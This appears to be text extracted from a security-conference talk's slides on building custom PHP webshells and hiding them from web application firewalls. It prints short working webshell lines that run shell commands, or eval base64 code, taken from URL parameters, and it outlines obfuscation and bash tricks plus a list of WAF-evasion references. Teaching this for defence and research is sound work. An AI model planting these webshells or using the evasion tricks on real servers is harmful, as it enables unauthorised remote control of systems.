Post on 28-Jun-2020
TENGO UN PERRO QUE
SE LLAMA WAF
jomoza@wafbypass:/home/bitup# cat talk | more
jomoza@wafbypass:/home/bitup# whoami
Josep Moreno (JoMoZa).@j0moz4youtube.com/loveisinthenet[*] loveisinthe.net
@bitupalicante [*] bitupalicante.com
jomoza@wafbypass:/home/bitup# cat talk | more
Webshell uploaded...
5 MINS AFTER...
jomoza@wafbypass:/home/bitup# cat talk | more
404
jomoza@wafbypass:/home/bitup# cat talk | more
If you ask about public webshells...
- Can include bad thinks
(minners, ...)
- Can include obfuscated
functions
(Functionalityless)
- IDS/WAF Detection
jomoza@wafbypass:/home/bitup# cat talk | more
Make your own webshell and 4 that...
jomoza@wafbypass:/home/bitup# cat talk | more
let’s talk about ofuscation php , vulnerable
functions and some bash tricks..
jomoza@wafbypass:/home/bitup# cat talk | more
IT’S A BIND SHELL
jomoza@wafbypass:/home/bitup# cat talk | more
IT’S A BIND SHELL
Apache, NGINX, Tomcat….Firefox, Chrome,....
webshells...<?php
echo system($_GET[“cmd”]);?>
RCE
<?phpecho system($_GET[“cmd”]);
?>
RCE:
# Remote CODE Execution
(Application context: “asp, jsp, php... functions)
webshells...
<?phpecho system($_GET[“cmd”]);
?>
RCE:
# Remote CODE Execution
(Application context: “asp, jsp, php... functions)
# Remote COMMAND Execution
(System context: “bash, sh, cmd,...”)
webshells...
jomoza@wafbypass:/home/bitup# php -c rce
https://stackoverflow.com/questions/3115559/exploitable-php-functions
jomoza@wafbypass:/home/bitup# cat talk | more
🖥
LeT’s OfUsCaTe
SyStEm() FuN
jomoza@wafbypass:/home/bitup# fileless like webshell
jomoza@wafbypass:/home/bitup#./makeitcool “system()”
PONER COMENTARIOS Y HEX
http://php.net/manual/en/functions.variable-functions.php
https://www.secjuice.com/php-rce-bypass-filters-sanitization-waf/
CONCATENATED STRING
USING DEFINED FUNCTIONS
/*SINGLE STRING CHARACTER*/
https://secure.php.net/manual/es/language.operators.string.php
APPLICATION
CONTEXT.
jomoza@wafbypass:/home/bitup# php “<?php rce; ?>”https://stackoverflow.com/questions/3115559/exploitable-php-functions
FILELESS ARE YOU?
https://github.com/lcatro/PHP-WebShell-Bypass-WAF
jomoza@wafbypass:/home/bitup# fileless like webshell
<?php eval(base64_decode($_GET["bcode"]));
?>
https://github.com/lcatro/PHP-WebShell-Bypass-WAF
FILELESS ARE YOU?
jomoza@wafbypass:/home/bitup# fileless like webshell
jomoza@wafbypass:/home/bitup# fileless like webshell
#2
SYSTEM
CONTEXT.
jomoza@wafbypass:/home/bitup# cat talk | more
jomoza@wafbypass:/home/bitup# cat talk | more
jomoza@wafbypass:/home/bitup# cat talk | more
DEMO #3
jomoza@wafbypass:/home/bitup# bash globbing
$ php -r 'echo "hello"." world"."\n";'
hello world
jomoza@wafbypass:/home/bitup# string literal concatenationhttps://unix.stackexchange.com/questions/10263/how-to-concatenate-string-variables-into-a-third
jomoza@wafbypass:/home/bitup# undefined variableshttps://www.secjuice.com/web-application-firewall-waf-evasion/
jomoza@wafbypass:/home/bitup# ./metamorphws start
jomoza@wafbypass:/home/bitup# curl “http://bibliography”
https://medium.com/secjuice/waf-evasion-techniques-718026d693d8https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0https://www.secjuice.com/web-application-firewall-waf-evasion/https://securityonline.info/bypass-waf-php-webshell-without-numbers-letters/
https://github.com/lcatro/PHP-WebShell-Bypass-WAFhttps://github.com/PortSwigger/bypass-wafhttps://stackoverflow.com/questions/3115559/exploitable-php-functionshttps://es.slideshare.net/SoroushDalili/waf-bypass-techniques-using-http-standard-and-web-servers-behaviour
@j0moz4
@bitupalicante